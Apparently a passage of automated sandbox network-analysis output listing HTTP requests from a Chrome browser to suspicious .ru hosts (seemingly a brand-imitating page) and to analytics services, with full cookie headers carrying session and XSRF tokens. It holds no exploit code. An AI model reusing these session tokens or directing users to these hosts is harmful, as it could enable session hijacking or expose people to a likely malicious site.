                Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zyvk.fgaiuin.ru/vEWf_VsEQpE6SZ7Y1x7k/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdFMVYrNVpmZStZLzY0Qy9EdXF5SlE9PSIsInZhbHVlIjoiRU1lcjBTQks3TVVqWWRBMWFyNThlT1ZCVk4yWjR6MldaWE1pQ3EzV3F6MStlMVFGdzRBQ1oxZHFjWWxScDkwczg4enhpZEFXa09vOGZzTVIwc01MSXZ3VzAxckY4RFN1aGUyT1lOLzBuRWVqNmhLR1hDSFZyMUZOVHovTmU3TlUiLCJtYWMiOiI4YTUxMmM0MTY0ZGViNjBlZDA1NzRkNzYzNzFjY2FkN2ZhZTE0ZjRmMjJlYjA1MWVlOGRkNTVmZWZlMTAxZDdhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlprWXBOS0hUU2xoRGpsSmpmY0JHZXc9PSIsInZhbHVlIjoiUnhqZk9wdGRVMGtXZ0ZVcnhUa0xlaXJWMXlsZDRmbnhTemJmL1czeU03amVRNkw0S3U5cUJlQ2FRSFZwdTlTL2w5dHQ1dzBHb0MxMFlpRVYzdllTcC9idjNENGp0MmxmM2liWmk4L2NmQXUwWU5CbUFUek9ISDdTblhpbDhxMWoiLCJtYWMiOiI5MTYzOTUxNjY3ZWRkYWJlYzIyZWVhOTYwMWQ3NTk2ZTA5OTczNTg5NGFmOWY5ODUxNjViMmJmYzI4NmVhZjQ2IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /tproxy/track/?verbose=1&ip=1&_=1743011016976 HTTP/1.1Host: mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"; sessionid=e8t3lapqi198t4w0069dx695dvxfgk5a
                Source: global trafficHTTP traffic detected: GET /v1/traces HTTP/1.1Host: api.honeycomb.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /machlo$agpzrfcb HTTP/1.1Host: kwzh.kdyukk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://zyvk.fgaiuin.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://zyvk.fgaiuin.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /tproxy/record/?%24current_url=https%3A%2F%2Fmixpanel.com%2Fpublic%2FFWfQuhi1aNTS16WPXLxRfi&%24lib_version=2.62.0&batch_start_time=1743011012.002&distinct_id=%24device%3A4a547060-e464-434e-957b-7d427db9c832&mp_lib=web&replay_id=ea6efaba-c433-4b59-bf32-a7baec207ab2&replay_length_ms=14286&replay_start_time=1743010999.37&replay_start_url=https%3A%2F%2Fmixpanel.com%2Fpublic%2FFWfQuhi1aNTS16WPXLxRfi&seq=1&%24device_id=4a547060-e464-434e-957b-7d427db9c832&format=gzip HTTP/1.1Host: mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"; sessionid=e8t3lapqi198t4w0069dx695dvxfgk5a
                Source: global trafficHTTP traffic detected: GET /machlo$agpzrfcb HTTP/1.1Host: kwzh.kdyukk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /machlo$agpzrfcb HTTP/1.1Host: kwzh.kdyukk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://zyvk.fgaiuin.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://zyvk.fgaiuin.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /vEWf_VsEQpE6SZ7Y1x7k/ HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://zyvk.fgaiuin.ru/vEWf_VsEQpE6SZ7Y1x7k/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImFtZE4xZS8vMk1xb2RDcWUxWk1UT2c9PSIsInZhbHVlIjoiZlNvaTkwK3FRQ1Q5NEVMZGM2M3IxRk53SGk1a2Z3T2FscEt2dkUwMU1kYnJseUpGdzNiSU42eis4ODB0Y3FCWWY0TWYzNUVWMTlzdHF4YWJ6ck5XVFl1M21LczV6TGhoOGFsS090SnJrS3hQdFZJeEVsQXp4SU9ja1pkZ1lsZHQiLCJtYWMiOiJhYWQ1ZTZjYzg4OGZjZDBjNzE0NzY3OGRlMDRhMGE2ZWFkZTRiN2UzYjU4ZGNhNWE1M2VlODdhMmY3ZjZmYzA3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkliRk8zZk8yakFESERvUFNxTG16Znc9PSIsInZhbHVlIjoiQ3pzL3J0eEtGU0ZpV3B2azVLQlg0VUYxeHRGWkJxN3EwMGpTaU1HQ0F3QXYvalhGdi9KODUrcjVlbTd2RUtreHlZaEFMMkdXNWFsd3Q0V1lJVzNReXVaeGYweU95dkZWYWNwZnBiL29JT2ZtR1dxRmhUdnBrUHFrRFFxNy9HUTAiLCJtYWMiOiI0NmQ1YTk0NjE0NGJhYzQxMzgyYWQ5YTRhNDUzOWM5M2JkOTVjZjk4ZmZjOWFmYWRhNzhhZmZjYzgwYWIxMzIwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ozq0UiZHd9C8b8YcCD8tmcoe1yeU2NWau1c7Os7o HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImFtZE4xZS8vMk1xb2RDcWUxWk1UT2c9PSIsInZhbHVlIjoiZlNvaTkwK3FRQ1Q5NEVMZGM2M3IxRk53SGk1a2Z3T2FscEt2dkUwMU1kYnJseUpGdzNiSU42eis4ODB0Y3FCWWY0TWYzNUVWMTlzdHF4YWJ6ck5XVFl1M21LczV6TGhoOGFsS090SnJrS3hQdFZJeEVsQXp4SU9ja1pkZ1lsZHQiLCJtYWMiOiJhYWQ1ZTZjYzg4OGZjZDBjNzE0NzY3OGRlMDRhMGE2ZWFkZTRiN2UzYjU4ZGNhNWE1M2VlODdhMmY3ZjZmYzA3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkliRk8zZk8yakFESERvUFNxTG16Znc9PSIsInZhbHVlIjoiQ3pzL3J0eEtGU0ZpV3B2azVLQlg0VUYxeHRGWkJxN3EwMGpTaU1HQ0F3QXYvalhGdi9KODUrcjVlbTd2RUtreHlZaEFMMkdXNWFsd3Q0V1lJVzNReXVaeGYweU95dkZWYWNwZnBiL29JT2ZtR1dxRmhUdnBrUHFrRFFxNy9HUTAiLCJtYWMiOiI0NmQ1YTk0NjE0NGJhYzQxMzgyYWQ5YTRhNDUzOWM5M2JkOTVjZjk4ZmZjOWFmYWRhNzhhZmZjYzgwYWIxMzIwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /machlo$agpzrfcb HTTP/1.1Host: kwzh.kdyukk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://zyvk.fgaiuin.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /rqmMm82swDD0R4oJbc7jZ02XcJruly8cwZzt5zjAsfw HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImRTalpjQWU2VVY5QjlOTEZWN09aeWc9PSIsInZhbHVlIjoiNEgzdXdIdHB4SVJWalZ5WGg0bUdidlprUTBjbEVYdk1kZnFtUkF5YjN3bXpoRXpmZHRaUlpOYnN0T0FBeWZqdlNYZjM3SEtBV09DNUQ2WkhTbm9waUhuanRUaGlDYW5oQ2x6Qm10bm9vQzBmSVNJL2RNUDNVT1YrNWZ4ZUprZDgiLCJtYWMiOiIwZDI1MmEwNDQ2ZDE0NzkxNDMyYzFiMmMyYjZkYWQ4NzQ1MjM2NTZlMDhjNDY1ZmQ3ODgxOTgyNjBmYjMwMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJCelo5MnZSTWxuYXY5bTM5WVhjQnc9PSIsInZhbHVlIjoieW41VEwxR0lQNGdvYmZOTlpmRnhSN0VZZXNlUkRqdGhCempneVZrNE1jZ3ZrYUI3N1cyaGJpQWdzcmxIam84azBCVS8zejJRVWpwNXErMnRQSllLcHZRRnZkbkcyUi83YlJSQU1LMm8rUHdvVlZLK1dGaldxeXBDUDRxdnN2cDIiLCJtYWMiOiJlNDBiZTViNzA1OTA5NGQwMmMxNDEzOGJkMmU5M2FiZTAyYjNiYzNjZThjMTI1NDBjZmZmM2Q2YWFlMDVkNjI2IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFN HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://zyvk.fgaiuin.ru/vEWf_VsEQpE6SZ7Y1x7k/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImRTalpjQWU2VVY5QjlOTEZWN09aeWc9PSIsInZhbHVlIjoiNEgzdXdIdHB4SVJWalZ5WGg0bUdidlprUTBjbEVYdk1kZnFtUkF5YjN3bXpoRXpmZHRaUlpOYnN0T0FBeWZqdlNYZjM3SEtBV09DNUQ2WkhTbm9waUhuanRUaGlDYW5oQ2x6Qm10bm9vQzBmSVNJL2RNUDNVT1YrNWZ4ZUprZDgiLCJtYWMiOiIwZDI1MmEwNDQ2ZDE0NzkxNDMyYzFiMmMyYjZkYWQ4NzQ1MjM2NTZlMDhjNDY1ZmQ3ODgxOTgyNjBmYjMwMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJCelo5MnZSTWxuYXY5bTM5WVhjQnc9PSIsInZhbHVlIjoieW41VEwxR0lQNGdvYmZOTlpmRnhSN0VZZXNlUkRqdGhCempneVZrNE1jZ3ZrYUI3N1cyaGJpQWdzcmxIam84azBCVS8zejJRVWpwNXErMnRQSllLcHZRRnZkbkcyUi83YlJSQU1LMm8rUHdvVlZLK1dGaldxeXBDUDRxdnN2cDIiLCJtYWMiOiJlNDBiZTViNzA1OTA5NGQwMmMxNDEzOGJkMmU5M2FiZTAyYjNiYzNjZThjMTI1NDBjZmZmM2Q2YWFlMDVkNjI2IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /12aNaBkhbtQKolWIvxydkeYP8915 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /xyEzOlhUCiierszzc4ef28 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveOrigin: https://zyvk.fgaiuin.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveOrigin: https://zyvk.fgaiuin.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveOrigin: https://zyvk.fgaiuin.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; 